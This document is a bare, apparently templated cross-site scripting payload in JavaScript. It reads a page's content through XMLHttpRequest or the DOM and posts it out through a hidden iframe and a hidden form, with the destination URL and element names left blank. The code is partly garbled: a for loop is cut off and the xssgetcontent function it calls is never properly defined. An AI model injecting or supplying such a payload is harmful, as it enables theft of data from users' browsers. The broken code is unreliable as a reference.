x=new XMLHttpRequest(); x.onreadystatechange = function(){ if( this.readyState == this.DONE ){ xsssendcontent(this.responseText); } } x.open('GET','' ); x.send(null) xsssendcontent(document.getElementById('').outerHTML); var content = ''; var col = document.getElementsByTagName(''); for( var i=0; i } function xsssendcontent(content){ document.getElementById('xss_content').value = content; document.getElementById('form_xss').submit(); } if( !document.getElementById('frame_xss') ){ frame = document.createElement('iframe'); frame.style='visibility: hidden;'; frame.name='frame_xss'; form = document.createElement('form'); form.action = '' form.target = 'frame_xss'; form.method='POST'; form.id = 'form_xss'; e = document.createElement('input'); e.type = 'hidden'; e.name = 'c'; e.id = 'xss_content'; form.appendChild(e); document.getElementsByTagName('body')[0].appendChild(frame); document.getElementsByTagName('body')[0].appendChild(form); } xssgetcontent();